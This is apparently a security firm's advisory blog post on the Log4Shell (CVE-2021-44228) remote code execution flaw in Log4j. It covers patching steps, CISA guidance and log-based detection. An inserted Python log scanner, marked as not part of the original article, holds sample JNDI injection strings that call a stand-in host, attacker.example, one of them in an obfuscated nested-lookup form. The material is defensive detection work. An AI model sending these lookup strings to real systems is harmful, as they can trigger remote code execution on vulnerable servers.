A new remote code execution (RCE) vulnerability (CVE-2021-44228 / CVSS score 10.0), dubbed LogJam/Log4Shell, hit the internet on Friday, December 10th, 2021 and has security professionals extremely concerned, and for good reason.
The vulnerable code is part of the Apache logging framework, an open source framework that developers use for logging. The source of the vulnerability, Log4j, is a Java library within that framework used to record application activity. Recent reports indicate exploitation may have started as early as December 1st, but there was no evidence of mass exploitation until the vulnerability went public.
The vulnerability first gained notoriety through Microsoft's Minecraft (the Java-based client edition), where individuals were able to run malicious commands through the in-game chat function. Since then, the vulnerability has spread to all corners of the internet, including Steam, iCloud and various hardware-based and software-based applications.
As this vulnerability allows for RCE, patches should be applied as soon as possible. A threat actor can take advantage of this vulnerability simply by sending specially crafted input to a device that logs it with the Log4j libraries. By crafting that input so that systems execute malicious code as it is logged by Log4j, they can potentially gain unauthorized remote control of these devices.
As this Java library is commonly used for logging, any application that uses the library (versions 2.0 to 2.14.1) is vulnerable to the RCE. If the logging service is externally facing, this only compounds the problem. The vulnerability is fixed in the latest version (2.15); however, this isn't as easy a fix for end users as it may initially seem.
Because the vulnerability stems from software built into hardware and from application software, an end-user IT department can only update the library if it owns and manages the source code of the device/software. If the IT department does not manage it, it must wait for the vendor to release a patch or cease using the device/software.
For most organizations, the company must first:
- Ensure they are aware of all of their software (hardware and application-based software) in use
- Analyze those software pieces for potential vulnerable Log4j libraries
- Monitor the vendor’s patch releases for an update patch (if the software is vulnerable)
- Upon release of the update, apply emergency patches following your organization's emergency patch process.
A security researcher (SwitHak) created a GitHub repository of links to all major company announcements relating to Log4j. Using this repository, an IT team can quickly search the listed vendors' Log4j disclosures to determine whether the software is vulnerable and, if so, whether a patch has been released. The repository is available at https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592.
Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly released the following statement concerning the vulnerability early Saturday morning.
“CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library. This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use. End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software. Vendors should also be communicating with their customers to ensure end users know that their product contains this vulnerability and should prioritize software updates.”
CISA recommends asset owners take three immediate steps as soon as possible:
- Enumerate any external facing devices that have Log4j installed.
- Make sure that your security operations center is actioning every single alert on the devices that fall into the category above.
- Install a web application firewall (WAF) with rules that automatically update so that your SOC is able to concentrate on fewer alerts.
The Schneider Downs cybersecurity team recommends starting with this repository to check whether any of your software is vulnerable and acting accordingly.
If there is additional software in your organization that is not linked within this repository, we recommend checking with the vendor or analyzing the software to determine if it is potentially vulnerable, while focusing on any software or hardware that is externally facing first, and then moving inward in the environment.
Fortunately, detecting indicators of compromise can easily be done by looking for specific strings in web server, proxy and application logs for systems that use Log4j. A quick check is to search for any request whose User-Agent or URL field contains “${jndi” and that returned a 200 HTTP status code. For further detection, the commands and rules linked in the resources below can be adapted to suit your needs.
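The quick check above, as an added example that is not part of the original article: a small Python scanner that runs over constructed web access-log lines, URL-decodes each line and collapses the single-character Log4j lookups commonly used to hide the “${jndi” string, then reports the line number and HTTP status of every hit so 200 responses can be triaged first. The log lines and the `attacker.example` host are constructed sample data.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not real traffic): a benign request,
# a plain lookup in the User-Agent, a URL-encoded lookup in the URL field and
# a nested-lookup form that a naive "${jndi" grep would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:14:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.7 - - [10/Dec/2021:14:02:11 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68"
10.0.0.8 - - [10/Dec/2021:14:03:30 +0000] "GET /api HTTP/1.1" 200 42 "-" "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/x}"
"""

# Log4j lookups that resolve to one character: ${lower:J} -> j,
# ${upper:n} -> N, ${::-l} -> l.  Collapsing them first lets the plain
# "${jndi" match from the article survive these wrappers.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):(.)\}|\$\{::-(.)\}", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode, collapse single-character lookups until stable, lowercase."""
    text = urllib.parse.unquote(text)
    prev = None
    while prev != text:  # nested wrappers need repeated passes
        prev = text
        text = _WRAPPER.sub(lambda m: m.group(1) or m.group(2), text)
    return text.lower()


def find_jndi_hits(log_text: str):
    """Return (line_number, http_status) for every line containing a JNDI lookup.

    Status is parsed from the common/combined log format ('... HTTP/1.1" 200 ...');
    a 200 means the request reached the application, which is what the
    article suggests prioritising. It is an attempt indicator, not proof of
    compromise.
    """
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if "${jndi" in normalize(line):
            m = re.search(r'" (\d{3}) ', line)
            hits.append((lineno, int(m.group(1)) if m else None))
    return hits


if __name__ == "__main__":
    for lineno, status in find_jndi_hits(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup string, HTTP status {status}")
```

A hit only shows that a lookup string arrived; confirm impact by checking the host for unexpected outbound LDAP/RMI connections or process launches around the same timestamp.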
This article is a continuation of our Apache Log4j Vulnerability series, available at /our-thoughts-on/category/cybersecurity. We encourage you to share our article with your network and reach out with any questions at [email protected].
Apache Log4j CISA Resources
- CISA Apache Log4j Vulnerability Guidance
- CISA Log4j (CVE-2021-44228) Vulnerability Guidance Github Repository
Apache Log4j Web Resources
- Apache – Log4j Security Vulnerability Center
- GitHub – BlueTeam CheatSheet * Log4Shell*
- GitHub – Log4j RCE Exploitation Detection
Related Articles
- Apache Log4j Vulnerability Update – Government Responses and Ransomware Activity
- Apache Log4j Vulnerability Update – CISA Issues Emergency Directive
- Apache Log4j Vulnerability Update – Remediation Tools and Patches
About Schneider Downs Cybersecurity
The Schneider Downs cybersecurity practice consists of experts offering a comprehensive set of information technology security services, including penetration testing, intrusion prevention/detection review, ransomware security, vulnerability assessments and a robust digital forensics and incident response team. For more information, visit www.schneiderdowns.com/cybersecurity or contact the team at [email protected].
In addition, our Digital Forensics and Incident Response teams are available 24x7x365 at 1-800-993-8937 if you suspect or are experiencing a network incident of any kind.
Want to be in the know? Subscribe to our bi-weekly newsletter, Focus on Cybersecurity, at www.schneiderdowns.com/subscribe.